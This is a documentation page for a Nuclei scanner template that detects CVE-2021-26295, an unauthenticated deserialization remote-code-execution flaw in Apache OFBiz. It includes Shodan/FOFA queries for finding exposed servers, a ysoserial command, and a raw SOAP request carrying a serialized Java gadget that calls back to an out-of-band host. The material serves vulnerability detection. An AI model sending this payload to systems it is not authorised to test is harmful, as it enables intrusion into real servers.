Apache OFBiz <17.12.06 - Arbitrary Code Execution
ID: CVE-2021-26295
Severity: critical
Author: madrobot
Tags: cve2021,cve,packetstorm,apache,ofbiz,deserialization,rce
Description
Section titled “Description”Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz.
YAML Source
Section titled “YAML Source”id: CVE-2021-26295
info: name: Apache OFBiz <17.12.06 - Arbitrary Code Execution author: madrobot severity: critical description: | Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade Apache OFBiz to version 17.12.06 or later to mitigate this vulnerability. reference: - https://github.com/yumusb/CVE-2021-26295-POC - https://packetstormsecurity.com/files/162104/Apache-OFBiz-SOAP-Java-Deserialization.html - https://github.com/zhzyker/exphub/tree/master/ofbiz - https://lists.apache.org/thread.html/r3c1802eaf34aa78a61b4e8e044c214bc94accbd28a11f3a276586a31%40%3Cuser.ofbiz.apache.org%3E - https://lists.apache.org/thread.html/r6e4579c4ebf7efeb462962e359501c6ca4045687f12212551df2d607@%3Cnotifications.ofbiz.apache.org%3E - https://nvd.nist.gov/vuln/detail/CVE-2021-26295 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-26295 cwe-id: CWE-502 epss-score: 0.97465 epss-percentile: 0.99956 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: apache product: ofbiz shodan-query: - "OFBiz.Visitor=" - http.html:"ofbiz" - ofbiz.visitor= fofa-query: - body="ofbiz" - app="apache_ofbiz" ysoserial-payload: java -jar ysoserial.jar URLDNS https://oob-url-to-request.tld | hex tags: cve2021,cve,packetstorm,apache,ofbiz,deserialization,rce
http: - raw: - | POST /webtools/control/SOAPService HTTP/1.1 Host: {{Hostname}} Content-Type: application/xml
<?xml version='1.0' encoding='UTF-8'?> <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header/> <soapenv:Body> <ns1:clearAllEntityCaches xmlns:ns1="http://ofbiz.apache.org/service/"> <ns1:cus-obj>{{generate_java_gadget("dns", "https://{{interactsh-url}}", "hex")}}</ns1:cus-obj> </ns1:clearAllEntityCaches> </soapenv:Body> </soapenv:Envelope>
matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "dns"
- type: word part: body words: - "errorMessage" condition: and
- type: word part: header words: - "OFBiz.Visitor="# digest: 4a0a0047304502201ae4439e3de24f6dfa75540222d907360c83130997afa18a3ddd4bcc2ab7376b022100c1ed81877d463393827fbcb172689b46bb85d02e88946e54c0c0328ff9e24224:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-26295.yaml"